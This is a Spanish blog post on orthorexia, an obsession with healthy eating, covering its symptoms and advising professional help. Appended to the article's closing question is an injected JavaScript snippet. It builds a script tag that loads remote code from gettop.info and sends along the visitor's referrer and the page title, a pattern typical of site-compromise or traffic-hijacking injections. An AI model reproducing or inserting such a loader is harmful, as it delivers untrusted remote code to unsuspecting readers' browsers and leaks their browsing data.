Salud y belleza » Dieta, Salud, alimentos, dieta saludable

Si te obsesionas por comer sano sufres ortorexia

Sin Comentarios

ortorexiaEn la actualidad se le da mucha importancia a la salud, y con ella a comer saludablemente y productos buenos para nuestro organismo y que eviten enfermedades. Sin embargo, hay casos en los que las personas se obsesionan tanto con los productos y alimentos sanos que puede llegar a convertirse en una obsesión y provocar un trastorno alimenticio.

En un principio se puede llegar a pensar en una obsesión relacionada con la pérdida de peso como la bulimia o la anorexia. Sin embargo, de lo que estamos hablando es de un trastorno por el que la gente llega a tener fobia a comer alimentos que no son saludables, eso es la ortorexia o orthorexia.

Una de las principales acciones que suelen tomar las personas que sufren ese trastorno es eliminar de su dieta cualquier tipo de carne, los alimentos con grasas y demás. Sin embargo, esos alimentos también son necesarios para nuestro organismo ya que la carne ayuda a equilibrar aminoácidos y la grasa para mantener el cerebro sano.  Por tanto, llevar la dieta saludable hasta el extremo hace que deje de ser saludable.

Las personas que sufren ortorexia suelen leer todas las etiquetas de los alimentos para ver si contienen algo que no sea sano. Planifican excesivamente qué van a comer cada día, pueden presentar pérdida de peso, aislamiento social y otros síntomas relacionados con los típicos trastornos obsesivos compulsivos.

Por ello es importante no obsesionarse y si estás pasando por este trastorno o conoces a alguien así será mejor que le ayudes para que reciba ayuda y visita a un nutricionista, porque todos los extremos son malos.

¿Padeces ortorexia o conoces a alguien que pueda padecer este trastorno?var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.